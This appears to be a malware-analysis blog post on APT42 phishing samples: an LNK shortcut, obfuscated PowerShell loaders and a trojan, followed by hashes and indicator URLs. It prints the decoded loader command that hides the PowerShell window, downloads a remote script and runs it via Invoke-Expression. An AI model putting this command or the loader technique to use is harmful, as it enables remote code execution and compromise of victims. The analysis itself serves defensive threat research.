APT42 phishing campaigns and malicious code like soldiers hiding deep in the jungle

 

Summary

I recently noted that the Google Threat Analysis Group was sharing insights on APT42. During 2024, I pay more attention to APT groups doing phishing around the world; of course, as you know, LNK is the type of phishing for delivering malware and has been popular for the past many years, and PowerShell is also now very popular for making malware. So here it is that I want to analyze the sample of APT42 that was shared by TAG.

 

Technical analysis

 

The hash sha256 c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3

Link information for property store data block.

Figure1- Link Information For Property

 

Extract a long string that appears obfuscated is “C:\Windows\System32\cmd.exe /c "set mv=popdsxwerpdsxshpdsxell -wpdsx pdsx1 "$epdsxs=(wgepdsxt -Urpdsxi  https://s3.tebi.io/erfs/pf2ncy.txt -UseBasicpdsxParsing).Content;&(gcm i?x)$es" & call %mv:pdsx=%".

String Replacement: %mv:pdsx=% replaces all instances of pdsx the mv variable with an empty string.

Resulting String: After replacement, mv likely contains.

“powershell -w 1  "$es=(wget -Uri https://s3.tebi.io/erfs/pf2ncy.txt -UseBasicParsing).Content;&(gcm i?x)$es"

By using it -w 1 to hide the PowerShell window.

Obfuscation: The use of gcm i?x and other obfuscations is likely intended to hide the true purpose of the code, making it more difficult to analyze and detect, in fact to execute the downloaded command via Invoke-Expression.

Conclusion: The LNK file will get malware from a remote machine https[:]//s3.tebi.io/erfs/pf2ncy.txt and execute a malicious payload.

 

 

The hash sha256 33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156

Obviously, this is a PowerShell script; at the beginning, it starts to open a link.

“https[:]//onedrive.live.com/embed?resid=204D6029500397E2%21127&authkey=!AOecuKGAdx__SEQ&em=2”

in Microsoft Edge, likely with a specific OneDrive file that talked about “the war between Hamas and Israel” to attract victim attention and disguise the aim of the malware operator.

Figure2- the war between Hamas and Israeli snippet

 

It is a very special and interesting thing that this mess of including three random PowerShell variables is defined without any real meaning; it tries to do so intentionally, interfering with analyst analysis. The real and valid malicious code was embedded in them, just like soldiers hiding deep in the jungle. 😇

Figure3-malicious code likely with Soldiers hiding deep in the jungle

 

 

Extract the real code from the chaotic code, likely by finding out the soldiers, and finally the malicious code includes three Parts. We will talk about them, followed closely.

Figure4-the main malicious code

 

 

The bbsert function takes in a base64-encoded string, decodes it, and converts it from a byte array into a UTF-8 string.The malicious strings:

'iltaHR0cHM6Ly9taXhlZGludGVnZXJsaW5lYXIuYmFyYmFy

YS1kZC1wYWRyb24ud29ya2Vycy5kZXY=' decodes to the URL https://mixedintegrgermlbarara-dd-pardonworkers.dev. Malicious payload downloaded from the URL and finally executed by the function Gorba with a parameter, a long string value given seems like public key. Yeah, you may note the custom function Keymaster which came from another PowerShell file, the hash sha256

4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f, this is PowerShell only for custom function Keymaster, which accecpted a parameter and use FromBase64String and AES to decrypt and replace special strings like “_____dest_____”.

Figure5-Keymaster

 

 

The hash sha256 c67cd544a112cab1bb75b3c44df4caf2045ef0af51de9ece11261d6c504add32

It is a PowerShell script that has the ability to download files and extract DLLs and ZIPs, grant permissions, start processes or services, use terminal services, create users, configure firewalls, establish SSH tunnels, and so on, which can be identified as a Trojan.

Figure6-PowerShell Trojan

 

 

IOCs

c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3

33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156

c67cd544a112cab1bb75b3c44df4caf2045ef0af51de9ece11261d6c504add32

4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f

 

hxxps://s3api.shop/api/termsrvx64.zip

hxxps://s3api.shop/api/sfile.zip

hxxps://s3api.shop/api/sconfig.zip

hxxps://s3api.shop/api/vmspolicyservice.zip

hxxps://s3api.shop/api/btnsendngip2024.php

hxxps://mixedintegrgermlbarara-dd-pardonworkers.dev

hxxps://s3.tebi.io/erfs/pf2ncy.txt

hxxps://translatorupdater.dns-dynamic.net

End.